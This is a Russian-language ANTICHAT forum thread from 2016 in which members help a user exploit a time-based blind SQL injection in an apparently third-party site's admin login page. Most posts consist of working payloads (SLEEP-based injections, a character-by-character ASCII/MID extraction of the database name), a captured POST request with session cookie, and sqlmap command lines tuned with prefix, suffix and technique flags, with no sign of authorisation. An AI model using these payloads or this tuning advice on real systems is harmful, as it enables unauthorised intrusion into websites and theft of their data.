HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2016, 20:39
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от BabaDook  

Точно .
джино хостинг кстати, у них какая то интересная настройка не то пых не то апач, пых наверно
 
Ответить с цитированием

  #2  
Старый 06.12.2016, 20:46
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Подскажите Blind SQL Injection на https://site.com/admin/login/ через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj

да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((
 
Ответить с цитированием

  #3  
Старый 06.12.2016, 20:49
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от madam  

Подскажите Blind SQL Injection на
https://site.com/admin/login/
через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj
да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((
sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)
 
Ответить с цитированием

  #4  
Старый 06.12.2016, 20:55
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Цитата:
Сообщение от t0ma5  

sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)
Вот я и говорю мож не те параметры задаю((

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login

sqlmap.py -u https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent

что тогда здесь не так?
 
Ответить с цитированием

  #5  
Старый 06.12.2016, 20:59
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от madam  

Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?
мде

для начала

Код:
sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs
 
Ответить с цитированием

  #6  
Старый 06.12.2016, 21:20
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Цитата:
Сообщение от t0ma5  

мде
для начала
Код:
sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs
POST parameter 'username' is not injectable((
 
Ответить с цитированием

  #7  
Старый 06.12.2016, 21:30
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от madam  

POST parameter 'username' is not injectable((
--prefix="'+" --suffix="+'" --technique=T
 
Ответить с цитированием

  #8  
Старый 06.12.2016, 22:55
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Всё равно ничего не находит((
 
Ответить с цитированием

  #9  
Старый 06.12.2016, 23:05
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

задавай параметры пустые
 
Ответить с цитированием

  #10  
Старый 06.12.2016, 23:19
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  

задавай параметры пустые
в смысле логин и пароль ,уже пыталась

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

вот таким перебором вытащила имя базы

но вот sqlmap никак нехочет найти ihj
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.